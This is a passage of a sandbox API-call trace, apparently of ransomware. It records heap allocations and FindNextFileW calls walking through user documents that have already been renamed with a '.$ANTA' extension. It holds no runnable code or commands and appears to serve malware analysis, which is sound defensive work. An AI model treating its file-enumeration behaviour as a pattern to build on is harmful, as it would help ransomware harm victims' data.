[0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.828] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.828] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.828] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb1f8507, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfb1f8507, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfb2447c4, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x7410, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="7QJQVMK.csv.$ANTA", cAlternateFileName="7QJQVM~1.$AN")) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.828] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.828] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca790 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.829] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.829] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.829] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb34fc28, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfb34fc28, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfb3c1f8e, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x18b90, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="cYT5WT.odt.$ANTA", cAlternateFileName="CYT5WT~1.$AN")) returned 1 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0079.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.830] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.830] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0079.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.831] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.831] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.831] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb4346aa, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfb4346aa, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfb4ffb2c, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xba70, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="eY_Dc1TDsg.pdf.$ANTA", cAlternateFileName="EY_DC1~1.$AN")) returned 1 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.831] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.831] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0079.832] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.832] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.832] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb53f660, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfb53f660, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfb658b91, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xb120, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="g_XT5mjGuHk8Nmh4F.pptx.$ANTA", cAlternateFileName="G_XT5M~1.$AN")) returned 1 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.833] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.833] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.833] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.834] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.834] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6bd02c, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfb6bd02c, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfb70935a, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xa850, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="hR3cojo6WftWpyW3h.odt.$ANTA", cAlternateFileName="HR3COJ~1.$AN")) returned 1 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0079.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.835] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb77bae6, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfb77bae6, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfb844a2b, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="IVMtcxmHJDptt31P9OCD.xls.$ANTA", cAlternateFileName="IVMTCX~1.$AN")) returned 1 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0079.835] 